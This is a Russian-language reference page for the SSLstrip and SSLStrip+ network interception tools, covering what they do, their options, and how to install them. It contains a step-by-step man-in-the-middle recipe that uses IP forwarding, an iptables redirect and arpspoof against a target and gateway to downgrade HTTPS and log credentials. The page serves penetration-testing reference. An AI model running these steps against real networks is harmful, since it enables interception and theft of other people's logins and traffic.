SSLstrip (SSLStrip+)
Описание SSLstrip
sslstrip — это инструмент, который незаметно перехватывает HTTP трафик в сети, следит за HTTPS ссылками и редиректами, а затем сопоставляет эти ссылки их HTTP двойникам или омографически сходным HTTPS ссылкам. Он также поддерживает режимы для подачи иконки сайта (favicon), которая выглядит как иконка замка, выборочное ведение журнала и отклонение сессий.
Домашняя страница: http://www.thoughtcrime.org/software/sslstrip/
Автор: Moxie Marlinspike
Лицения: GPLv3
Описание SSLStrip+
Это новая версия SSLstrip с новой функцией обхода механизма защиты HTTP Strict Transport Security (HSTS).
Эта версия, как и оригинальная, меняет HTTPS на HTTP плюс имя хоста в html коде для избежания HSTS.
Для того, чтобы она работала, также нужен DNS сервер, который возвращает вспять изменения, сделанный прокси. Таким DNS сервером является dns2proxy.
Домашняя страница: https://github.com/singe/sslstrip2/ (доступный форк). Первоначально программа была опубликована автором по адресу https://github.com/LeonardoNve/sslstrip2, но из-за нового испанского закона, запрещающего публикацию "наступательных" инструментов/техник в сфере безопасности, он был вынужден удалить исходный код.
Автор: LeonardoNve
Лицения: GPLv3
Справка по SSLstrip
Использование:
sslstrip <опции>
Опции: -w <имя_файла>, --write=<мя_файла> Задаёт файл для лога (опционально). -p , --post Записывать в журнал только SSL POST. (по умолчанию) -s , --ssl Записывать весь SSL трафик к и от сервера. -a , --all Записывать весь SSL и HTTP трафик к и от сервера. -l <порт>, --listen=<порт> Порт для прослушивания (по умолчанию 10000). -f , --favicon Подменить иконку сайта на замок для безопасных запросов. -k , --killsessions Убить текущие сессии. -h Напечатать это сообщение помощи.
Руководство по SSLstrip
Страница man присутствует, но полностью повторяет справку.
Как работает sslstrip?
Во-первых, arpspoof убеждает хост, что наш MAC адрес — это MAC адрес роутера, и цель начинает отправлять нам весь сетевой трафик. Ядро перенаправляет всё, кроме трафика предназначенного для порта 80, который перенаправляется в $listenPort (10000, например).
Таким образом sslstrip получает трафик и делает свою магию.
Примеры запуска SSLstrip
Записать результаты в файл (-w sslstrip.log), прослушивать на порту 8080 (-l 8080):
root@kali:~# sslstrip -w sslstrip.log -l 8080 sslstrip 0.9 by Moxie Marlinspike running...
Запуск sslstrip
Переключите вашу машину в режим пересылки (форвардинга).
echo "1" > /proc/sys/net/ipv4/ip_forward
Настройте iptables для редиректа HTTP трафика на sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
Запустите sslstrip.
sslstrip.py -l <listenPort>
Запустите arpspoof, чтобы убедить сети, что им следует отправлять их трафик вам.
arpspoof -i <interface> -t <targetIP> <gatewayIP>
Установка SSLstrip
Программа предустановлена в Kali Linux.
Установка sslstrip в Linux
Требования
- Python >= 2.5 (apt-get install python)
- Модуль python "twisted-web" (apt-get install python-twisted-web)
Установка
tar zxvf sslstrip-0.9.tar.gz cd sslstrip-0.9
(опционально)
sudo python ./setup.py install
Скриншоты SSLstrip
Это утилита командной строки.
Инструкции по SSLstrip
- Инструкция по использованию SSLStrip+ и dns2proxy для обхода HSTS
- Инструкция по использованию Router Scan by Stas’M. Часть третья: Применение фальшивого VPN (атака человек-посередине+обход HSTS)
Comments are Closed